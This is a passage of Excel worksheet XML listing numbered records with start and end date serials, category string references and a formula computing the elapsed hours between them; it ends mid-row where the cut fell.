      <c r="A1460" t="s">
        <v>3940</v>
      </c>
      <c r="B1460">
        <v>11761</v>
      </c>
      <c r="C1460" t="s">
        <v>3941</v>
      </c>
      <c r="D1460" t="s">
        <v>7</v>
      </c>
      <c r="E1460" s="1">
        <v>43328.931817129633</v>
      </c>
      <c r="F1460" s="1">
        <v>43329.129259259258</v>
      </c>
      <c r="G1460" t="s">
        <v>1958</v>
      </c>
      <c r="H1460" t="str">
        <f>TEXT(F1460-E1460,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1461" spans="1:8">
      <c r="A1461" t="s">
        <v>3942</v>
      </c>
      <c r="B1461">
        <v>11760</v>
      </c>
      <c r="C1461" t="s">
        <v>3943</v>
      </c>
      <c r="D1461" t="s">
        <v>7</v>
      </c>
      <c r="E1461" s="1">
        <v>43328.87709490741</v>
      </c>
      <c r="F1461" s="1">
        <v>43329.582476851851</v>
      </c>
      <c r="G1461" t="s">
        <v>98</v>
      </c>
      <c r="H1461" t="str">
        <f>TEXT(F1461-E1461,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="1462" spans="1:8">
      <c r="A1462" t="s">
        <v>3944</v>
      </c>
      <c r="B1462">
        <v>11759</v>
      </c>
      <c r="C1462" t="s">
        <v>3945</v>
      </c>
      <c r="D1462" t="s">
        <v>7</v>
      </c>
      <c r="E1462" s="1">
        <v>43328.869722222225</v>
      </c>
      <c r="F1462" s="1">
        <v>43329.12736111111</v>
      </c>
      <c r="G1462" t="s">
        <v>98</v>
      </c>
      <c r="H1462" t="str">
        <f>TEXT(F1462-E1462,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1463" spans="1:8">
      <c r="A1463" t="s">
        <v>3946</v>
      </c>
      <c r="B1463">
        <v>11758</v>
      </c>
      <c r="C1463" t="s">
        <v>3947</v>
      </c>
      <c r="D1463" t="s">
        <v>7</v>
      </c>
      <c r="E1463" s="1">
        <v>43328.864479166667</v>
      </c>
      <c r="F1463" s="1">
        <v>43329.126979166664</v>
      </c>
      <c r="G1463" t="s">
        <v>456</v>
      </c>
      <c r="H1463" t="str">
        <f>TEXT(F1463-E1463,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1464" spans="1:8">
      <c r="A1464" t="s">
        <v>3948</v>
      </c>
      <c r="B1464">
        <v>11757</v>
      </c>
      <c r="C1464" t="s">
        <v>3949</v>
      </c>
      <c r="D1464" t="s">
        <v>7</v>
      </c>
      <c r="E1464" s="1">
        <v>43328.860243055555</v>
      </c>
      <c r="F1464" s="1">
        <v>43328.918333333335</v>
      </c>
      <c r="G1464" t="s">
        <v>3950</v>
      </c>
      <c r="H1464" t="str">
        <f>TEXT(F1464-E1464,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1465" spans="1:8" hidden="1">
      <c r="A1465" t="s">
        <v>3923</v>
      </c>
      <c r="B1465">
        <v>11756</v>
      </c>
      <c r="C1465" t="s">
        <v>3924</v>
      </c>
      <c r="D1465" t="s">
        <v>7</v>
      </c>
      <c r="E1465" s="1">
        <v>43328.682546296295</v>
      </c>
      <c r="F1465" s="1">
        <v>43329.949988425928</v>
      </c>
      <c r="G1465" t="s">
        <v>333</v>
      </c>
      <c r="H1465" t="str">
        <f>TEXT(F1465-E1465,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1466" spans="1:8" hidden="1">
      <c r="B1466">
        <v>11755</v>
      </c>
      <c r="C1466" t="s">
        <v>3951</v>
      </c>
      <c r="D1466" t="s">
        <v>7</v>
      </c>
      <c r="E1466" s="1">
        <v>43328.45853009259</v>
      </c>
      <c r="F1466" s="1">
        <v>43333.677071759259</v>
      </c>
      <c r="G1466" t="s">
        <v>769</v>
      </c>
      <c r="H1466" t="str">
        <f>TEXT(F1466-E1466,"[h]")</f>
        <v>125</v>
      </c>
    </row>
    <row r="1467" spans="1:8">
      <c r="A1467" t="s">
        <v>3952</v>
      </c>
      <c r="B1467">
        <v>11754</v>
      </c>
      <c r="C1467" t="s">
        <v>3953</v>
      </c>
      <c r="D1467" t="s">
        <v>7</v>
      </c>
      <c r="E1467" s="1">
        <v>43328.365671296298</v>
      </c>
      <c r="F1467" s="1">
        <v>43329.121886574074</v>
      </c>
      <c r="G1467" t="s">
        <v>16</v>
      </c>
      <c r="H1467" t="str">
        <f>TEXT(F1467-E1467,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1468" spans="1:8" hidden="1">
      <c r="A1468" t="s">
        <v>3954</v>
      </c>
      <c r="B1468">
        <v>11750</v>
      </c>
      <c r="C1468" t="s">
        <v>3955</v>
      </c>
      <c r="D1468" t="s">
        <v>7</v>
      </c>
      <c r="E1468" s="1">
        <v>43328.044548611113</v>
      </c>
      <c r="F1468" s="1">
        <v>43329.925069444442</v>
      </c>
      <c r="G1468" t="s">
        <v>174</v>
      </c>
      <c r="H1468" t="str">
        <f>TEXT(F1468-E1468,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="1469" spans="1:8">
      <c r="A1469" t="s">
        <v>3956</v>
      </c>
      <c r="B1469">
        <v>11746</v>
      </c>
      <c r="C1469" t="s">
        <v>3957</v>
      </c>
      <c r="D1469" t="s">
        <v>7</v>
      </c>
      <c r="E1469" s="1">
        <v>43327.683877314812</v>
      </c>
      <c r="F1469" s="1">
        <v>43327.786631944444</v>
      </c>
      <c r="G1469" t="s">
        <v>1120</v>
      </c>
      <c r="H1469" t="str">
        <f>TEXT(F1469-E1469,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1470" spans="1:8" hidden="1">
      <c r="A1470" t="s">
        <v>3958</v>
      </c>
      <c r="B1470">
        <v>11745</v>
      </c>
      <c r="C1470" t="s">
        <v>3959</v>
      </c>
      <c r="D1470" t="s">
        <v>7</v>
      </c>
      <c r="E1470" s="1">
        <v>43327.590011574073</v>
      </c>
      <c r="F1470" s="1">
        <v>43327.68546296296</v>
      </c>
      <c r="G1470" t="s">
        <v>3960</v>
      </c>
      <c r="H1470" t="str">
        <f>TEXT(F1470-E1470,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1471" spans="1:8" hidden="1">
      <c r="A1471" t="s">
        <v>3961</v>
      </c>
      <c r="B1471">
        <v>11743</v>
      </c>
      <c r="C1471" t="s">
        <v>3962</v>
      </c>
      <c r="D1471" t="s">
        <v>7</v>
      </c>
      <c r="E1471" s="1">
        <v>43327.51153935185</v>
      </c>
      <c r="F1471" s="1">
        <v>43329.949976851851</v>
      </c>
      <c r="G1471" t="s">
        <v>109</v>
      </c>
      <c r="H1471" t="str">
        <f>TEXT(F1471-E1471,"[h]")</f>
        <v>58</v>
      </c>
    </row>
    <row r="1472" spans="1:8" hidden="1">
      <c r="A1472" t="s">
        <v>3963</v>
      </c>
      <c r="B1472">
        <v>11742</v>
      </c>
      <c r="C1472" t="s">
        <v>3964</v>
      </c>
      <c r="D1472" t="s">
        <v>7</v>
      </c>
      <c r="E1472" s="1">
        <v>43326.971909722219</v>
      </c>
      <c r="F1472" s="1">
        <v>43329.697071759256</v>
      </c>
      <c r="G1472" t="s">
        <v>445</v>
      </c>
      <c r="H1472" t="str">
        <f>TEXT(F1472-E1472,"[h]")</f>
        <v>65</v>
      </c>
    </row>
    <row r="1473" spans="1:8">
      <c r="A1473" t="s">
        <v>3965</v>
      </c>
      <c r="B1473">
        <v>11740</v>
      </c>
      <c r="C1473" t="s">
        <v>3907</v>
      </c>
      <c r="D1473" t="s">
        <v>7</v>
      </c>
      <c r="E1473" s="1">
        <v>43326.771620370368</v>
      </c>
      <c r="F1473" s="1">
        <v>43326.803344907406</v>
      </c>
      <c r="G1473" t="s">
        <v>16</v>
      </c>
      <c r="H1473" t="str">
        <f>TEXT(F1473-E1473,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1474" spans="1:8">
      <c r="A1474" t="s">
        <v>3966</v>
      </c>
      <c r="B1474">
        <v>11739</v>
      </c>
      <c r="C1474" t="s">
        <v>3967</v>
      </c>
      <c r="D1474" t="s">
        <v>7</v>
      </c>
      <c r="E1474" s="1">
        <v>43326.766168981485</v>
      </c>
      <c r="F1474" s="1">
        <v>43430.98641203704</v>
      </c>
      <c r="G1474" t="s">
        <v>16</v>
      </c>
      <c r="H1474" t="str">
        <f>TEXT(F1474-E1474,"[h]")</f>
        <v>2501</v>
      </c>
    </row>
    <row r="1475" spans="1:8" hidden="1">
      <c r="A1475" t="s">
        <v>3968</v>
      </c>
      <c r="B1475">
        <v>11738</v>
      </c>
      <c r="C1475" t="s">
        <v>3969</v>
      </c>
      <c r="D1475" t="s">
        <v>7</v>
      </c>
      <c r="E1475" s="1">
        <v>43326.398900462962</v>
      </c>
      <c r="F1475" s="1">
        <v>43329.694479166668</v>
      </c>
      <c r="G1475" t="s">
        <v>95</v>
      </c>
      <c r="H1475" t="str">
        <f>TEXT(F1475-E1475,"[h]")</f>
        <v>79</v>
      </c>
    </row>
    <row r="1476" spans="1:8">
      <c r="A1476" t="s">
        <v>3970</v>
      </c>
      <c r="B1476">
        <v>11735</v>
      </c>
      <c r="C1476" t="s">
        <v>3917</v>
      </c>
      <c r="D1476" t="s">
        <v>7</v>
      </c>
      <c r="E1476" s="1">
        <v>43325.868761574071</v>
      </c>
      <c r="F1476" s="1">
        <v>43330.577152777776</v>
      </c>
      <c r="G1476" t="s">
        <v>610</v>
      </c>
      <c r="H1476" t="str">
        <f>TEXT(F1476-E1476,"[h]")</f>
        <v>113</v>
      </c>
    </row>
    <row r="1477" spans="1:8" hidden="1">
      <c r="A1477" t="s">
        <v>3971</v>
      </c>
      <c r="B1477">
        <v>11734</v>
      </c>
      <c r="C1477" t="s">
        <v>3972</v>
      </c>
      <c r="D1477" t="s">
        <v>7</v>
      </c>
      <c r="E1477" s="1">
        <v>43325.749641203707</v>
      </c>
      <c r="F1477" s="1">
        <v>43328.980046296296</v>
      </c>
      <c r="G1477" t="s">
        <v>251</v>
      </c>
      <c r="H1477" t="str">
        <f>TEXT(F1477-E1477,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="1478" spans="1:8" hidden="1">
      <c r="A1478" t="s">
        <v>3973</v>
      </c>
      <c r="B1478">
        <v>11733</v>
      </c>
      <c r="C1478" t="s">
        <v>3974</v>
      </c>
      <c r="D1478" t="s">
        <v>7</v>
      </c>
      <c r="E1478" s="1">
        <v>43325.699733796297</v>
      </c>
      <c r="F1478" s="1">
        <v>43327.042604166665</v>
      </c>
      <c r="G1478" t="s">
        <v>916</v>
      </c>
      <c r="H1478" t="str">
        <f>TEXT(F1478-E1478,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="1479" spans="1:8" hidden="1">
      <c r="A1479" t="s">
        <v>3975</v>
      </c>
      <c r="B1479">
        <v>11731</v>
      </c>
      <c r="C1479" t="s">
        <v>3976</v>
      </c>
      <c r="D1479" t="s">
        <v>7</v>
      </c>
      <c r="E1479" s="1">
        <v>43325.533726851849</v>
      </c>
      <c r="F1479" s="1">
        <v>43325.576157407406</v>
      </c>
      <c r="G1479" t="s">
        <v>1453</v>
      </c>
      <c r="H1479" t="str">
        <f>TEXT(F1479-E1479,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1480" spans="1:8">
      <c r="A1480" t="s">
        <v>3977</v>
      </c>
      <c r="B1480">
        <v>11727</v>
      </c>
      <c r="C1480" t="s">
        <v>3945</v>
      </c>
      <c r="D1480" t="s">
        <v>7</v>
      </c>
      <c r="E1480" s="1">
        <v>43325.256030092591</v>
      </c>
      <c r="F1480" s="1">
        <v>43325.627592592595</v>
      </c>
      <c r="G1480" t="s">
        <v>16</v>
      </c>
      <c r="H1480" t="str">
        <f>TEXT(F1480-E1480,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1481" spans="1:8">
      <c r="A1481" t="s">
        <v>3978</v>
      </c>
      <c r="B1481">
        <v>11725</v>
      </c>
      <c r="C1481" t="s">
        <v>3947</v>
      </c>
      <c r="D1481" t="s">
        <v>7</v>
      </c>
      <c r="E1481" s="1">
        <v>43325.090162037035</v>
      </c>
      <c r="F1481" s="1">
        <v>43326.622094907405</v>
      </c>
      <c r="G1481" t="s">
        <v>483</v>
      </c>
      <c r="H1481" t="str">
        <f>TEXT(F1481-E1481,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1482" spans="1:8" hidden="1">
      <c r="A1482" t="s">
        <v>3979</v>
      </c>
      <c r="B1482">
        <v>11722</v>
      </c>
      <c r="C1482" t="s">
        <v>3980</v>
      </c>
      <c r="D1482" t="s">
        <v>7</v>
      </c>
      <c r="E1482" s="1">
        <v>43324.753009259257</v>
      </c>
      <c r="F1482" s="1">
        <v>43326.63689814815</v>
      </c>
      <c r="G1482" t="s">
        <v>174</v>
      </c>
      <c r="H1482" t="str">
        <f>TEXT(F1482-E1482,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="1483" spans="1:8">
      <c r="A1483" t="s">
        <v>3981</v>
      </c>
      <c r="B1483">
        <v>11721</v>
      </c>
      <c r="C1483" t="s">
        <v>3982</v>
      </c>
      <c r="D1483" t="s">
        <v>7</v>
      </c>
      <c r="E1483" s="1">
        <v>43324.738217592596</v>
      </c>
      <c r="F1483" s="1">
        <v>43450.837500000001</v>
      </c>
      <c r="G1483" t="s">
        <v>2916</v>
      </c>
      <c r="H1483" t="str">
        <f>TEXT(F1483-E1483,"[h]")</f>
        <v>3026</v>
      </c>
    </row>
    <row r="1484" spans="1:8">
      <c r="A1484" t="s">
        <v>3988</v>
      </c>
      <c r="B1484">
        <v>11718</v>
      </c>
      <c r="C1484" t="s">
        <v>3949</v>
      </c>
      <c r="D1484" t="s">
        <v>7</v>
      </c>
      <c r="E1484" s="1">
        <v>43324.587164351855</v>
      </c>
      <c r="F1484" s="1">
        <v>43326.646018518521</v>
      </c>
      <c r="G1484" t="s">
        <v>3989</v>
      </c>
      <c r="H1484" t="str">
        <f>TEXT(F1484-E1484,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1485" spans="1:8" hidden="1">
      <c r="A1485" t="s">
        <v>3983</v>
      </c>
      <c r="B1485">
        <v>11717</v>
      </c>
      <c r="C1485" t="s">
        <v>3984</v>
      </c>
      <c r="D1485" t="s">
        <v>7</v>
      </c>
      <c r="E1485" s="1">
        <v>43324.586342592593</v>
      </c>
      <c r="F1485" s="1">
        <v>43324.657465277778</v>
      </c>
      <c r="G1485" t="s">
        <v>3985</v>
      </c>
      <c r="H1485" t="str">
        <f>TEXT(F1485-E1485,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1486" spans="1:8">
      <c r="A1486" t="s">
        <v>3990</v>
      </c>
      <c r="B1486">
        <v>11716</v>
      </c>
      <c r="C1486" t="s">
        <v>3991</v>
      </c>
      <c r="D1486" t="s">
        <v>7</v>
      </c>
      <c r="E1486" s="1">
        <v>43324.363125000003</v>
      </c>
      <c r="F1486" s="1">
        <v>43330.577141203707</v>
      </c>
      <c r="G1486" t="s">
        <v>16</v>
      </c>
      <c r="H1486" t="str">
        <f>TEXT(F1486-E1486,"[h]")</f>
        <v>149</v>
      </c>
    </row>
    <row r="1487" spans="1:8">
      <c r="A1487" t="s">
        <v>3992</v>
      </c>
      <c r="B1487">
        <v>11715</v>
      </c>
      <c r="C1487" t="s">
        <v>3921</v>
      </c>
      <c r="D1487" t="s">
        <v>7</v>
      </c>
      <c r="E1487" s="1">
        <v>43324.310023148151</v>
      </c>
      <c r="F1487" s="1">
        <v>43329.958298611113</v>
      </c>
      <c r="G1487" t="s">
        <v>3993</v>
      </c>
      <c r="H1487" t="str">
        <f>TEXT(F1487-E1487,"[h]")</f>
        <v>135</v>
      </c>
    </row>
    <row r="1488" spans="1:8" hidden="1">
      <c r="A1488" t="s">
        <v>3994</v>
      </c>
      <c r="B1488">
        <v>11714</v>
      </c>
      <c r="C1488" t="s">
        <v>3995</v>
      </c>
      <c r="D1488" t="s">
        <v>7</v>
      </c>
      <c r="E1488" s="1">
        <v>43323.710578703707</v>
      </c>
      <c r="F1488" s="1">
        <v>43324.657465277778</v>
      </c>
      <c r="G1488" t="s">
        <v>409</v>
      </c>
      <c r="H1488" t="str">
        <f>TEXT(F1488-E1488,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1489" spans="1:8" hidden="1">
      <c r="A1489" t="s">
        <v>3996</v>
      </c>
      <c r="B1489">
        <v>11713</v>
      </c>
      <c r="C1489" t="s">
        <v>3997</v>
      </c>
      <c r="D1489" t="s">
        <v>7</v>
      </c>
      <c r="E1489" s="1">
        <v>43323.670335648145</v>
      </c>
      <c r="F1489" s="1">
        <v>43334.912245370368</v>
      </c>
      <c r="G1489" t="s">
        <v>2165</v>
      </c>
      <c r="H1489" t="str">
        <f>TEXT(F1489-E1489,"[h]")</f>
        <v>269</v>
      </c>
    </row>
    <row r="1490" spans="1:8">
      <c r="A1490" t="s">
        <v>3986</v>
      </c>
      <c r="B1490">
        <v>11711</v>
      </c>
      <c r="C1490" t="s">
        <v>3987</v>
      </c>
      <c r="D1490" t="s">
        <v>7</v>
      </c>
      <c r="E1490" s="1">
        <v>43323.291331018518</v>
      </c>
      <c r="F1490" s="1">
        <v>43324.645335648151</v>
      </c>
      <c r="G1490" t="s">
        <v>16</v>
      </c>
      <c r="H1490" t="str">
        <f>TEXT(F1490-E1490,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="1491" spans="1:8">
      <c r="A1491" t="s">
        <v>3998</v>
      </c>
      <c r="B1491">
        <v>11710</v>
      </c>
      <c r="C1491" t="s">
        <v>3999</v>
      </c>
      <c r="D1491" t="s">
        <v>7</v>
      </c>
      <c r="E1491" s="1">
        <v>43322.902129629627</v>
      </c>
      <c r="F1491" s="1">
        <v>43330.767384259256</v>
      </c>
      <c r="G1491" t="s">
        <v>106</v>
      </c>
      <c r="H1491" t="str">
        <f>TEXT(F1491-E1491,"[h]")</f>
        <v>188</v>
      </c>
    </row>
    <row r="1492" spans="1:8">
      <c r="A1492" t="s">
        <v>3956</v>
      </c>
      <c r="B1492">
        <v>11708</v>
      </c>
      <c r="C1492" t="s">
        <v>4000</v>
      </c>
      <c r="D1492" t="s">
        <v>7</v>
      </c>
      <c r="E1492" s="1">
        <v>43322.842349537037</v>
      </c>
      <c r="F1492" s="1">
        <v>43327.68167824074</v>
      </c>
      <c r="G1492" t="s">
        <v>22</v>
      </c>
      <c r="H1492" t="str">
        <f>TEXT(F1492-E1492,"[h]")</f>
        <v>116</v>
      </c>
    </row>
    <row r="1493" spans="1:8" hidden="1">
      <c r="A1493" t="s">
        <v>4001</v>
      </c>
      <c r="B1493">
        <v>11705</v>
      </c>
      <c r="C1493" t="s">
        <v>4002</v>
      </c>
      <c r="D1493" t="s">
        <v>7</v>
      </c>
      <c r="E1493" s="1">
        <v>43322.41002314815</v>
      </c>
      <c r="F1493" s="1">
        <v>43322.482442129629</v>
      </c>
      <c r="G1493" t="s">
        <v>157</v>
      </c>
      <c r="H1493" t="str">
        <f>TEXT(F1493-E1493,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1494" spans="1:8" hidden="1">
      <c r="A1494" t="s">
        <v>4003</v>
      </c>
      <c r="B1494">
        <v>11704</v>
      </c>
      <c r="C1494" t="s">
        <v>4004</v>
      </c>
      <c r="D1494" t="s">
        <v>7</v>
      </c>
      <c r="E1494" s="1">
        <v>43322.299120370371</v>
      </c>
      <c r="F1494" s="1">
        <v>43581.009745370371</v>
      </c>
      <c r="G1494" t="s">
        <v>118</v>
      </c>
      <c r="H1494" t="str">
        <f>TEXT(F1494-E1494,"[h]")</f>
        <v>6209</v>
      </c>
    </row>
    <row r="1495" spans="1:8" hidden="1">
      <c r="A1495" t="s">
        <v>4005</v>
      </c>
      <c r="B1495">
        <v>11703</v>
      </c>
      <c r="C1495" t="s">
        <v>4006</v>
      </c>
      <c r="D1495" t="s">
        <v>7</v>
      </c>
      <c r="E1495" s="1">
        <v>43322.288645833331</v>
      </c>
      <c r="F1495" s="1">
        <v>43324.821504629632</v>
      </c>
      <c r="G1495" t="s">
        <v>174</v>
      </c>
      <c r="H1495" t="str">
        <f>TEXT(F1495-E1495,"[h]")</f>
        <v>60</v>
      </c>
    </row>
    <row r="1496" spans="1:8" hidden="1">
      <c r="A1496" t="s">
        <v>4007</v>
      </c>
      <c r="B1496">
        <v>11702</v>
      </c>
      <c r="C1496" t="s">
        <v>4008</v>
      </c>
      <c r="D1496" t="s">
        <v>7</v>
      </c>
      <c r="E1496" s="1">
        <v>43321.943553240744</v>
      </c>
      <c r="F1496" s="1">
        <v>43397.454456018517</v>
      </c>
      <c r="G1496" t="s">
        <v>55</v>
      </c>
      <c r="H1496" t="str">
        <f>TEXT(F1496-E1496,"[h]")</f>
        <v>1812</v>
      </c>
    </row>
    <row r="1497" spans="1:8">
      <c r="A1497" t="s">
        <v>4009</v>
      </c>
      <c r="B1497">
        <v>11695</v>
      </c>
      <c r="C1497" t="s">
        <v>4010</v>
      </c>
      <c r="D1497" t="s">
        <v>7</v>
      </c>
      <c r="E1497" s="1">
        <v>43321.253969907404</v>
      </c>
      <c r="F1497" s="1">
        <v>43321.637696759259</v>
      </c>
      <c r="G1497" t="s">
        <v>16</v>
      </c>
      <c r="H1497" t="str">
        <f>TEXT(F1497-E1497,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1498" spans="1:8">
      <c r="A1498" t="s">
        <v>4014</v>
      </c>
      <c r="B1498">
        <v>11694</v>
      </c>
      <c r="C1498" t="s">
        <v>3909</v>
      </c>
      <c r="D1498" t="s">
        <v>7</v>
      </c>
      <c r="E1498" s="1">
        <v>43321.247395833336</v>
      </c>
      <c r="F1498" s="1">
        <v>43331.308541666665</v>
      </c>
      <c r="G1498" t="s">
        <v>19</v>
      </c>
      <c r="H1498" t="str">
        <f>TEXT(F1498-E1498,"[h]")</f>
        <v>241</v>
      </c>
    </row>
    <row r="1499" spans="1:8" hidden="1">
      <c r="A1499" t="s">
        <v>4015</v>
      </c>
      <c r="B1499">
        <v>11693</v>
      </c>
      <c r="C1499" t="s">
        <v>4016</v>
      </c>
      <c r="D1499" t="s">
        <v>7</v>
      </c>
      <c r="E1499" s="1">
        <v>43320.927835648145</v>
      </c>
      <c r="F1499" s="1">
        <v>43352.090451388889</v>
      </c>
      <c r="G1499" t="s">
        <v>1305</v>
      </c>
      <c r="H1499" t="str">
        <f>TEXT(F1499-E1499,"[h]")</f>
        <v>747</v>
      </c>
    </row>
    <row r="1500" spans="1:8" hidden="1">
      <c r="A1500" t="s">
        <v>4017</v>
      </c>
      <c r="B1500">
        <v>11692</v>
      </c>
      <c r="C1500" t="s">
        <v>4018</v>
      </c>
      <c r="D1500" t="s">
        <v>7</v>
      </c>
      <c r="E1500" s="1">
        <v>43320.854884259257</v>
      </c>
      <c r="F1500" s="1">
        <v>43320.943993055553</v>
      </c>
      <c r="G1500" t="s">
        <v>163</v>
      </c>
      <c r="H1500" t="str">
        <f>TEXT(F1500-E1500,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1501" spans="1:8">
      <c r="A1501" t="s">
        <v>4011</v>
      </c>
      <c r="B1501">
        <v>11691</v>
      </c>
      <c r="C1501" t="s">
        <v>4012</v>
      </c>
      <c r="D1501" t="s">
        <v>7</v>
      </c>
      <c r="E1501" s="1">
        <v>43320.84302083333</v>
      </c>
      <c r="F1501" s="1">
        <v>43321.287523148145</v>
      </c>
      <c r="G1501" t="s">
        <v>4013</v>
      </c>
      <c r="H1501" t="str">
        <f>TEXT(F1501-E1501,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1502" spans="1:8" hidden="1">
      <c r="A1502" t="s">
        <v>4019</v>
      </c>
      <c r="B1502">
        <v>11689</v>
      </c>
      <c r="C1502" t="s">
        <v>4020</v>
      </c>
      <c r="D1502" t="s">
        <v>7</v>
      </c>
      <c r="E1502" s="1">
        <v>43320.731990740744</v>
      </c>
      <c r="F1502" s="1">
        <v>43539.226666666669</v>
      </c>
      <c r="G1502" t="s">
        <v>4021</v>
      </c>
      <c r="H1502" t="str">
        <f>TEXT(F1502-E1502,"[h]")</f>
        <v>5243</v>
      </c>
    </row>
    <row r="1503" spans="1:8" hidden="1">
      <c r="A1503" t="s">
        <v>4022</v>
      </c>
      <c r="B1503">
        <v>11688</v>
      </c>
      <c r="C1503" t="s">
        <v>4023</v>
      </c>
      <c r="D1503" t="s">
        <v>7</v>
      </c>
      <c r="E1503" s="1">
        <v>43320.530393518522</v>
      </c>
      <c r="F1503" s="1">
        <v>43320.68886574074</v>
      </c>
      <c r="G1503" t="s">
        <v>157</v>
      </c>
      <c r="H1503" t="str">
        <f>TEXT(F1503-E1503,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1504" spans="1:8" hidden="1">
      <c r="A1504" t="s">
        <v>4024</v>
      </c>
      <c r="B1504">
        <v>11685</v>
      </c>
      <c r="C1504" t="s">
        <v>4025</v>
      </c>
      <c r="D1504" t="s">
        <v>7</v>
      </c>
      <c r="E1504" s="1">
        <v>43320.009652777779</v>
      </c>
      <c r="F1504" s="1">
        <v>43324.919166666667</v>
      </c>
      <c r="G1504" t="s">
        <v>2631</v>
      </c>
      <c r="H1504" t="str">
        <f>TEXT(F1504-E1504,"[h]")</f>
        <v>117</v>
      </c>
    </row>
    <row r="1505" spans="1:8">
      <c r="A1505" t="s">
        <v>4026</v>
      </c>
      <c r="B1505">
        <v>11684</v>
      </c>
      <c r="C1505" t="s">
        <v>4027</v>
      </c>
      <c r="D1505" t="s">
        <v>7</v>
      </c>
      <c r="E1505" s="1">
        <v>43319.86346064815</v>
      </c>
      <c r="F1505" s="1">
        <v>43573.51190972222</v>
      </c>
      <c r="G1505" t="s">
        <v>25</v>
      </c>
      <c r="H1505" t="str">
        <f>TEXT(F1505-E1505,"[h]")</f>
        <v>6087</v>
      </c>
    </row>
    <row r="1506" spans="1:8">
      <c r="A1506" t="s">
        <v>4028</v>
      </c>
      <c r="B1506">
        <v>11682</v>
      </c>
      <c r="C1506" t="s">
        <v>4029</v>
      </c>
      <c r="D1506" t="s">
        <v>7</v>
      </c>
      <c r="E1506" s="1">
        <v>43319.58425925926</v>
      </c>
      <c r="F1506" s="1">
        <v>43319.656759259262</v>
      </c>
      <c r="G1506" t="s">
        <v>713</v>
      </c>
      <c r="H1506" t="str">
        <f>TEXT(F1506-E1506,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1507" spans="1:8">
      <c r="A1507" t="s">
        <v>4030</v>
      </c>
      <c r="B1507">
        <v>11681</v>
      </c>
      <c r="C1507" t="s">
        <v>4031</v>
      </c>
      <c r="D1507" t="s">
        <v>7</v>
      </c>
      <c r="E1507" s="1">
        <v>43319.24119212963</v>
      </c>
      <c r="F1507" s="1">
        <v>43478.829895833333</v>
      </c>
      <c r="G1507" t="s">
        <v>4032</v>
      </c>
      <c r="H1507" t="str">
        <f>TEXT(F1507-E1507,"[h]")</f>
        <v>3830</v>
      </c>
    </row>
    <row r="1508" spans="1:8" hidden="1">
      <c r="A1508" t="s">
        <v>4033</v>
      </c>
      <c r="B1508">
        <v>11679</v>
      </c>
      <c r="C1508" t="s">
        <v>4034</v>
      </c>
      <c r="D1508" t="s">
        <v>7</v>
      </c>
      <c r="E1508" s="1">
        <v>43318.904305555552</v>
      </c>
      <c r="F1508" s="1">
        <v>43319.188356481478</v>
      </c>
      <c r="G1508" t="s">
        <v>55</v>
      </c>
      <c r="H1508" t="str">
        <f>TEXT(F1508-E1508,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1509" spans="1:8" hidden="1">
      <c r="A1509" t="s">
        <v>4035</v>
      </c>
      <c r="B1509">
        <v>11678</v>
      </c>
      <c r="C1509" t="s">
        <v>4036</v>
      </c>
      <c r="D1509" t="s">
        <v>7</v>
      </c>
      <c r="E1509" s="1">
        <v>43318.453518518516</v>
      </c>
      <c r="F1509" s="1">
        <v>43318.516863425924</v>
      </c>
      <c r="G1509" t="s">
        <v>304</v>
      </c>
      <c r="H1509" t="str">
        <f>TEXT(F1509-E1509,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1510" spans="1:8" hidden="1">
      <c r="A1510" t="s">
        <v>4037</v>
      </c>
      <c r="B1510">
        <v>11673</v>
      </c>
      <c r="C1510" t="s">
        <v>4038</v>
      </c>
      <c r="D1510" t="s">
        <v>7</v>
      </c>
      <c r="E1510" s="1">
        <v>43317.425902777781</v>
      </c>
      <c r="F1510" s="1">
        <v>43321.007534722223</v>
      </c>
      <c r="G1510" t="s">
        <v>255</v>
      </c>
      <c r="H1510" t="str">
        <f>TEXT(F1510-E1510,"[h]")</f>
        <v>85</v>
      </c>
    </row>
    <row r="1511" spans="1:8" hidden="1">
      <c r="A1511" t="s">
        <v>4039</v>
      </c>
      <c r="B1511">
        <v>11671</v>
      </c>
      <c r="C1511" t="s">
        <v>4040</v>
      </c>
      <c r="D1511" t="s">
        <v>7</v>
      </c>
      <c r="E1511" s="1">
        <v>43316.244039351855</v>
      </c>
      <c r="F1511" s="1">
        <v>43417.709247685183</v>
      </c>
      <c r="G1511" t="s">
        <v>461</v>
      </c>
      <c r="H1511" t="str">
        <f>TEXT(F1511-E1511,"[h]")</f>
        <v>2435</v>
      </c>
    </row>
    <row r="1512" spans="1:8" hidden="1">
      <c r="A1512" t="s">
        <v>4041</v>
      </c>
      <c r="B1512">
        <v>11670</v>
      </c>
      <c r="C1512" t="s">
        <v>4042</v>
      </c>
      <c r="D1512" t="s">
        <v>7</v>
      </c>
      <c r="E1512" s="1">
        <v>43315.958854166667</v>
      </c>
      <c r="F1512" s="1">
        <v>43320.696319444447</v>
